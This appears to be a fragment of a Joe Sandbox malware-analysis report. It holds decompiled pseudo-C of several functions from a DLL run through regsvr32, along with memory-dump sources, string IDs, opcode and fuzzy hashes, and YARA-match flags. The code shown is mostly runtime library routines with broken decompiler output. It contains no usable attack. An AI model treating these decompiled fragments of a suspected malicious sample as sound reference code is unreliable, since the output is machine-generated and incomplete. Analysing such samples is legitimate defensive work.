                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastNameTranslatewcschr$CodePageValidabort
                                                                                                    • String ID:
                                                                                                    • API String ID: 4237316620-0
                                                                                                    • Opcode ID: 24b3cd23c5a4b1ebd06da55b711aa448849f0d30043c0003cea4910184831b1b
                                                                                                    • Instruction ID: d82e61f75d1d8d46a1c8c6956a4d6356b2b0ae17dbdb0f934ffc74d807f22dbb
                                                                                                    • Opcode Fuzzy Hash: 24b3cd23c5a4b1ebd06da55b711aa448849f0d30043c0003cea4910184831b1b
                                                                                                    • Instruction Fuzzy Hash: A981B032200B8885FBA29F21D5917D933A4E78CBC8F56C125BE4867786DF38CB59C744
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018002E908 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 333COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 64%
                                                                                                    			E0000000118002E908(void* __edx, intOrPtr* __rax, long long __rbx, intOrPtr* __rcx, long long __rdx, long long _a8, void* _a16, long long _a24, intOrPtr _a26, long long _a32) {
				long long _v72;
				intOrPtr _v80;
				void* _v88;
				long long _v96;
				long long _v104;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t33;
				void* _t37;
				intOrPtr* _t66;
				signed long long _t68;
				long long _t70;
				long long _t72;
				long long _t78;
				void* _t83;
				void* _t90;
				long long _t104;
				long long _t108;
				void* _t110;
				intOrPtr* _t112;
				void* _t114;
				void* _t117;
				intOrPtr _t129;
				void* _t131;
				void* _t132;
				signed long long _t133;
				signed long long _t134;
				signed long long _t137;
				intOrPtr* _t138;

				_t66 = __rax;
				_a8 = __rbx;
				_a16 = __rdx;
				if (__rdx != 0) goto 0x8002e944;
				_t33 = E0000000118002E69C(__rax);
				_t3 = _t108 + 0x16; // 0x16
				 *__rax = _t3;
				E0000000118002E4F0(_t33);
				goto 0x8002eae4;
				asm("xorps xmm0, xmm0");
				 *((long long*)(__rdx)) = _t108;
				asm("movdqu [ebp-0x20], xmm0");
				_v72 = _t108;
				if ( *__rcx == _t108) goto 0x8002e9af;
				_a24 = 0x3f2a;
				_a26 = dil;
				E00000001180038CC4( *__rcx,  &_a24);
				if (_t66 != 0) goto 0x8002e986;
				r8d = 0;
				_t37 = E0000000118002ED44(__rcx,  *__rcx,  &_a24, _t108, _t110, _t114, _t117,  &_v88);
				goto 0x8002e992;
				0x8002ef68();
				r14d = _t37;
				if (_t37 != 0) goto 0x8002e9a2;
				goto 0x8002e956;
				goto 0x8002eaa8;
				_t112 = _v88;
				_t129 = _v80;
				_a24 = _t108;
				_t68 = _t129 - _t112;
				_t137 = (_t68 >> 3) + 1;
				_t90 =  >  ? _t108 : _t68 + 7 >> 3;
				_t134 = _t133 | 0xffffffff;
				if (_t90 == 0) goto 0x8002ea11;
				_t70 = _t134 + 1;
				if ( *((intOrPtr*)( *_t112 + _t70)) != dil) goto 0x8002e9f2;
				if (_t108 + 1 != _t90) goto 0x8002e9ec;
				_a24 = _t108 + 1 + _t70;
				r8d = 1;
				E00000001180010168(_t137, _t108 + 1 + _t70, _t108 + 1);
				_t78 = _t70;
				if (_t70 == 0) goto 0x8002eaa1;
				_t104 = _t70 + _t137 * 8;
				_t138 = _t112;
				_v96 = _t104;
				_a32 = _t104;
				if (_t112 == _t129) goto 0x8002ea97;
				_v104 = _t78 - _t112;
				_t131 = _t134 + 1;
				if ( *((intOrPtr*)( *_t138 + _t131)) != dil) goto 0x8002ea51;
				_t132 = _t131 + 1;
				if (E00000001180038BF0(0, _t104, _t78, _t104, _t104 - _t104 + _a24, _t132) != 0) goto 0x8002eafc;
				_t72 = _a32;
				 *((long long*)(_v104 + _t138)) = _t72;
				_a32 = _t72 + _t132;
				if (_t138 + 8 != _t129) goto 0x8002ea4b;
				r14d = 0;
				 *_a16 = _t78;
				E0000000118002E8A0(_a16, _v104);
				_t83 =  >  ? _t108 : _t129 - _t112 + 7 >> 3;
				if (_t83 == 0) goto 0x8002ead9;
				E0000000118002E8A0(_a16,  *_t112);
				if (_t108 + 1 != _t83) goto 0x8002eac5;
				E0000000118002E8A0(_a16, _t112);
				return r14d;
			}

































                                                                                                    0x18002e908
                                                                                                    0x18002e908
                                                                                                    0x18002e90d
                                                                                                    0x18002e92c
                                                                                                    0x18002e92e
                                                                                                    0x18002e933
                                                                                                    0x18002e936
                                                                                                    0x18002e938
                                                                                                    0x18002e93f
                                                                                                    0x18002e944
                                                                                                    0x18002e947
                                                                                                    0x18002e94d
                                                                                                    0x18002e952
                                                                                                    0x18002e956
                                                                                                    0x18002e95f
                                                                                                    0x18002e965
                                                                                                    0x18002e969
                                                                                                    0x18002e974
                                                                                                    0x18002e97a
                                                                                                    0x18002e97f
                                                                                                    0x18002e984
                                                                                                    0x18002e98d
                                                                                                    0x18002e992
                                                                                                    0x18002e997
                                                                                                    0x18002e9a0
                                                                                                    0x18002e9aa
                                                                                                    0x18002e9af
                                                                                                    0x18002e9b6
                                                                                                    0x18002e9c0
                                                                                                    0x18002e9c4
                                                                                                    0x18002e9d1
                                                                                                    0x18002e9df
                                                                                                    0x18002e9e3
                                                                                                    0x18002e9ea
                                                                                                    0x18002e9f2
                                                                                                    0x18002e9f9
                                                                                                    0x18002ea0b
                                                                                                    0x18002ea0d
                                                                                                    0x18002ea11
                                                                                                    0x18002ea1d
                                                                                                    0x18002ea22
                                                                                                    0x18002ea28
                                                                                                    0x18002ea2a
                                                                                                    0x18002ea2e
                                                                                                    0x18002ea31
                                                                                                    0x18002ea38
                                                                                                    0x18002ea3f
                                                                                                    0x18002ea47
                                                                                                    0x18002ea51
                                                                                                    0x18002ea58
                                                                                                    0x18002ea5d
                                                                                                    0x18002ea71
                                                                                                    0x18002ea77
                                                                                                    0x18002ea83
                                                                                                    0x18002ea8e
                                                                                                    0x18002ea95
                                                                                                    0x18002ea9b
                                                                                                    0x18002ea9e
                                                                                                    0x18002eaa3
                                                                                                    0x18002eabc
                                                                                                    0x18002eac3
                                                                                                    0x18002eac8
                                                                                                    0x18002ead7
                                                                                                    0x18002eadc
                                                                                                    0x18002eafb

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo$CurrentProcess
                                                                                                    • String ID: *$*?$.
                                                                                                    • API String ID: 3547364082-3996258217
                                                                                                    • Opcode ID: d75af92f8769b040a13610600d6393a03e8cf74cfb35eafd99915545613fd0ef
                                                                                                    • Instruction ID: 9273d27e47971eba6ca66b620e01850928db26a7861d15b5b8331b1de476b9d2
                                                                                                    • Opcode Fuzzy Hash: d75af92f8769b040a13610600d6393a03e8cf74cfb35eafd99915545613fd0ef
                                                                                                    • Instruction Fuzzy Hash: 6AC1D372B50B9885FB93DFA698003ED67A4B74DBD8F548526EE4D17B85DF38C14A8300
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0261CB5C Relevance: 7.9, Strings: 6, Instructions: 440COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4B:F$MT$M^]o$e3t.$xT$|
                                                                                                    • API String ID: 0-890126359
                                                                                                    • Opcode ID: e1dea5b6d8c2e186fc969677d634024d2b5d45915fc3be5ce0ca492671772bd8
                                                                                                    • Instruction ID: 740cc35825c4b094c6dc7a198c8b712eda8918abf5e841d9cc1c1712563dab75
                                                                                                    • Opcode Fuzzy Hash: e1dea5b6d8c2e186fc969677d634024d2b5d45915fc3be5ce0ca492671772bd8
                                                                                                    • Instruction Fuzzy Hash: 2F32E5709496CA8BDBF8CF24C889AED7BE1FB48304F101569D85E8E255DB787644CF82
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02606040 Relevance: 7.7, Strings: 6, Instructions: 211COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 6qy$8$T\$U+$X`$y
                                                                                                    • API String ID: 0-664257668
                                                                                                    • Opcode ID: 8ba47ac7caf24041313fbba2a36e08a724addb6d2b2f3fda6ade5b43fd151b3e
                                                                                                    • Instruction ID: d13682e9a3848183f3bff76eaf194770c183b026e97dc7b1715e753e10f6eac8
                                                                                                    • Opcode Fuzzy Hash: 8ba47ac7caf24041313fbba2a36e08a724addb6d2b2f3fda6ade5b43fd151b3e
                                                                                                    • Instruction Fuzzy Hash: 41A12270D003088BDF68DFA9D4858AEFFB4FF44304F14812ED466AA2A4D7B8954ACF42
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02627838 Relevance: 6.5, Strings: 5, Instructions: 297COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: &J}T$,s2$I#TH$O$/
                                                                                                    • API String ID: 0-3512324241
                                                                                                    • Opcode ID: 2a74b7a9a019f77f7482ba62d53a0185635735da14b3a0a2c088c73731d030e8
                                                                                                    • Instruction ID: 644e2fb3654b33fdccdc9a75c002411d3166f8dcff3b67dffd538fdf2aa6dbfc
                                                                                                    • Opcode Fuzzy Hash: 2a74b7a9a019f77f7482ba62d53a0185635735da14b3a0a2c088c73731d030e8
                                                                                                    • Instruction Fuzzy Hash: 6CF1A770505B88CFEBF9DF24CC85AEB7BA5FB44306F50261DD84A8A290EB746645CF41
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02618D38 Relevance: 6.5, Strings: 5, Instructions: 238COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: #X$<.s+$OF$b2$cq
                                                                                                    • API String ID: 0-2132489910
                                                                                                    • Opcode ID: fa27675d97e1edcca43cc7220fd85ea0f2a7e4671fcfbf328185c561f77f0531
                                                                                                    • Instruction ID: 295f441a41c3d50edf631af313af7c2857fe22b98c102f5ea1de2c866f608bc0
                                                                                                    • Opcode Fuzzy Hash: fa27675d97e1edcca43cc7220fd85ea0f2a7e4671fcfbf328185c561f77f0531
                                                                                                    • Instruction Fuzzy Hash: 8BC1E171514788CBDB9CCF28D88A8DD3BA1FB48358F55621DFD0A972A0D775E884CB84
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0261E680 Relevance: 6.3, Strings: 5, Instructions: 69COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Gz$Ia$L?$qO$v
                                                                                                    • API String ID: 0-2265458986
                                                                                                    • Opcode ID: 51d998f9b809787c7898191e40db603b3d7b25973240bf0713c5690b3beb5f3e
                                                                                                    • Instruction ID: f2f8d41cd4fdbc356d1a6a5b9d5a4471f8b8bd146e321155f2d5e069acb41e16
                                                                                                    • Opcode Fuzzy Hash: 51d998f9b809787c7898191e40db603b3d7b25973240bf0713c5690b3beb5f3e
                                                                                                    • Instruction Fuzzy Hash: 1631C4B090078A8BDB48DF64C84A1DF7BF0FB58358F010A19E859A6290D7B8D664CFC5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02602F58 Relevance: 5.7, Strings: 4, Instructions: 701COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: #X$+8;$OuKh$c+q
                                                                                                    • API String ID: 0-2220089762
                                                                                                    • Opcode ID: bdead50c049a5b5eee19619261ac0d1ce51221f7b9802058420e6267d9de3ef6
                                                                                                    • Instruction ID: 490ad752cca1306e342aee59593c76bc3f6150d9d491ee971091bc6c3e2d1888
                                                                                                    • Opcode Fuzzy Hash: bdead50c049a5b5eee19619261ac0d1ce51221f7b9802058420e6267d9de3ef6
                                                                                                    • Instruction Fuzzy Hash: 9962E771A046088FDF6CDFA8D49A59EBBF2FB44344F00412DEA46A7390D7B9D816CB85
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02620C14 Relevance: 5.4, Strings: 4, Instructions: 428COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: !~$AW_ $J~Jk$R\l
                                                                                                    • API String ID: 0-1361730130
                                                                                                    • Opcode ID: 07129ebfa5121cf1ad49bfd1637d0daec9c1be8e2da850114bdf3e3e6a14b3ed
                                                                                                    • Instruction ID: 74eca9b69326d40ccc3d89fdafd8758fe6094dd1e4d83abddf5ba029e7db6141
                                                                                                    • Opcode Fuzzy Hash: 07129ebfa5121cf1ad49bfd1637d0daec9c1be8e2da850114bdf3e3e6a14b3ed
                                                                                                    • Instruction Fuzzy Hash: 69221971A04709AFDB48DFA8C04A99DBBF2FF44344F4081ADE806AB250E7759A19CF85
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018002ED44 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 145COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E0000000118002ED44(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32) {
				signed long long _t15;
				signed long long _t16;
				void* _t24;
				signed long long _t33;

				_t15 = _t33;
				 *((long long*)(_t15 + 8)) = __rbx;
				 *((long long*)(_t15 + 0x10)) = __rbp;
				 *((long long*)(_t15 + 0x18)) = __rsi;
				 *((long long*)(_t15 + 0x20)) = __rdi;
				_t16 = _t15 | 0xffffffff;
				_t24 = _t16 + 1;
				if ( *((char*)(__rcx + _t24)) != 0) goto 0x8002ed74;
				if (_t24 + __rdx - _t16 - __r8 <= 0) goto 0x8002edaf;
				return __rdx + 0xb;
			}







                                                                                                    0x18002ed44
                                                                                                    0x18002ed47
                                                                                                    0x18002ed4b
                                                                                                    0x18002ed4f
                                                                                                    0x18002ed53
                                                                                                    0x18002ed61
                                                                                                    0x18002ed74
                                                                                                    0x18002ed7b
                                                                                                    0x18002ed8b
                                                                                                    0x18002edae

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: .
                                                                                                    • API String ID: 0-248832578
                                                                                                    • Opcode ID: 8d327e4fe4abddf56d618438df8a4c9cb50eee1b4f0408e606f4f46497b22710
                                                                                                    • Instruction ID: 87850db886f43d32ce16c9a0296860f63af7057bd9f62da57299ff41449acc39
                                                                                                    • Opcode Fuzzy Hash: 8d327e4fe4abddf56d618438df8a4c9cb50eee1b4f0408e606f4f46497b22710
                                                                                                    • Instruction Fuzzy Hash: 1F410832710AD845FBA29F3299047DAAB91B759BE4F14C725BE6C07BD5DE38C6098300
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0260BC5E Relevance: 5.3, Strings: 4, Instructions: 338COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: [$j=::$s{$v
                                                                                                    • API String ID: 0-3443420022
                                                                                                    • Opcode ID: ddd817000d9669b6aa0569bc07ca69e518ac6d7c9e8f21f7b3e67444c066e474
                                                                                                    • Instruction ID: 6233dd94abf7b8ee7f96f5e5742d30865f323be38262d587b3a28389c6d8f364
                                                                                                    • Opcode Fuzzy Hash: ddd817000d9669b6aa0569bc07ca69e518ac6d7c9e8f21f7b3e67444c066e474
                                                                                                    • Instruction Fuzzy Hash: 18F1C375504788DBDBACCF28C8C949A3FA1FF543A4FA05219FD42872A0D7B6D985CB81
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02606F44 Relevance: 5.3, Strings: 4, Instructions: 288COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: %gKA$lC${8$=
                                                                                                    • API String ID: 0-1755628603
                                                                                                    • Opcode ID: f948f8049dffa46f6c1908c0c36a5bed0e2181e44779f751a8dbf7e49607b940
                                                                                                    • Instruction ID: f93a7f2d7f06ceb8e6183317f23cf9f972ee63d334c2fece32ccbf1c9324bbd8
                                                                                                    • Opcode Fuzzy Hash: f948f8049dffa46f6c1908c0c36a5bed0e2181e44779f751a8dbf7e49607b940
                                                                                                    • Instruction Fuzzy Hash: 49D1F57050474D8FDB48DF28C88A4DE3BA1FB68398F16121DFC4AA62A0D778D595CF88
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02625564 Relevance: 5.2, Strings: 4, Instructions: 213COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 87$[z[$zv$~8
                                                                                                    • API String ID: 0-862344672
                                                                                                    • Opcode ID: 7ba2a2e0181502dd8565a48da7628e73930a520399ade9f65484eaf9569e96b5
                                                                                                    • Instruction ID: 4e58abd692305367a2a9c8ff1c9d4119dfa2a3cfee1a972d86df9db0c1a90698
                                                                                                    • Opcode Fuzzy Hash: 7ba2a2e0181502dd8565a48da7628e73930a520399ade9f65484eaf9569e96b5
                                                                                                    • Instruction Fuzzy Hash: 38A10070D047198BDF58CFA8D88A9DEBBF1FB48304F10811EE916B6290D7789949CFA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02628CA0 Relevance: 5.2, Strings: 4, Instructions: 150COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: >i$?K$L8$c^
                                                                                                    • API String ID: 0-812893500
                                                                                                    • Opcode ID: 8356ba3094b0a8e5aa5a6e320f766849f87787f106e7b3d49372d13f37628491
                                                                                                    • Instruction ID: 721b2685a1410337c35fd614bb56cb2473a91f4bda2c2dc411dd55b464ca3a87
                                                                                                    • Opcode Fuzzy Hash: 8356ba3094b0a8e5aa5a6e320f766849f87787f106e7b3d49372d13f37628491
                                                                                                    • Instruction Fuzzy Hash: F8614D705106499BDF48CF28C8994DD3BA1FB48398F9A6719FC4AA7390D778D484CF84
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0261866C Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: )c$9$g]$nS
                                                                                                    • API String ID: 0-2742661510
                                                                                                    • Opcode ID: 6e77312b20058e0cbead119b87e05f4837dae5fbcc24597088c782410860d629
                                                                                                    • Instruction ID: e7bcccfe51248cf8ff0be958dbbf8fb55ee7e2b0357c2637d7090b1b87cd3208
                                                                                                    • Opcode Fuzzy Hash: 6e77312b20058e0cbead119b87e05f4837dae5fbcc24597088c782410860d629
                                                                                                    • Instruction Fuzzy Hash: 0D415570619B459FD798DF28C48952BBBE1FB98745F80692DF486C7360CB70D845CB82
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018003BF60 Relevance: 4.8, APIs: 3, Instructions: 340COMMONLIBRARYCODECrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E0000000118003BF60(intOrPtr* __rcx, long long __rdx, long long _a16) {

				_a16 = __rdx;
				r9d =  *__rcx;
				if (r9d != 0) goto 0x8003bf88;
				return 0;
			}



                                                                                                    0x18003bf60
                                                                                                    0x18003bf6e
                                                                                                    0x18003bf7a
                                                                                                    0x18003bf87

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy_s
                                                                                                    • String ID:
                                                                                                    • API String ID: 1502251526-0
                                                                                                    • Opcode ID: f646c23d6193fa0482f1f57b15dfbc353103bb694e9ff58c9917c75d11ac26fb
                                                                                                    • Instruction ID: 1454d382d8795bfd1d7ca0deffd5f65b649ca79ef91f0771b2af4ec08ca759f4
                                                                                                    • Opcode Fuzzy Hash: f646c23d6193fa0482f1f57b15dfbc353103bb694e9ff58c9917c75d11ac26fb
                                                                                                    • Instruction Fuzzy Hash: 34D1B03271468987EBB6CF15E184B9BB7A1F38D784F15C124EB4A97B44DB38DA49CB00
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02623BB8 Relevance: 4.7, Strings: 3, Instructions: 932COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Kaw$D"$D"
                                                                                                    • API String ID: 0-528324057
                                                                                                    • Opcode ID: 96217d481531bd94cfaddc03632e5c04024cc4f4895eaeef056931154249cfef
                                                                                                    • Instruction ID: 579573303d97857acc9d4707e14f630b949aa413512e9a1d893077813df9ec15
                                                                                                    • Opcode Fuzzy Hash: 96217d481531bd94cfaddc03632e5c04024cc4f4895eaeef056931154249cfef
                                                                                                    • Instruction Fuzzy Hash: 6CB24F7550478C8FEFF9DF28CC896DA3BA5EB55314F60422ADC0ACA260DB769694CB40
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180040C70 Relevance: 4.7, APIs: 3, Instructions: 165COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 49%
                                                                                                    			E00000001180040C70(void* __ecx, signed int __edx, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long _a16, long long _a24) {
				void* _v24;
				signed int _v40;
				char _v280;
				unsigned int _t47;
				int _t48;
				void* _t50;
				void* _t55;
				unsigned int _t70;
				signed int _t76;
				signed int _t81;
				signed int _t83;
				signed long long _t115;
				signed long long _t116;
				void* _t121;
				void* _t134;
				unsigned int* _t142;
				intOrPtr* _t144;
				void* _t146;
				signed long long _t155;
				signed long long _t156;

				_t134 = __rdx;
				_t81 = __edx;
				_a16 = __rbx;
				_a24 = __rsi;
				_t115 =  *0x8005d010; // 0xb03f6156e10
				_t116 = _t115 ^ _t146 - 0x00000120;
				_v40 = _t116;
				_t121 = __rcx;
				E0000000118002C43C(_t116, __rcx);
				_t4 = _t116 + 0x98; // 0x98
				_t144 = _t4;
				E0000000118002C43C(_t116, _t121);
				_t142 =  *((intOrPtr*)(_t116 + 0x3a0));
				_t47 = E00000001180040FB0(_t121, _t134);
				r9d = 0x78;
				_t70 = _t47;
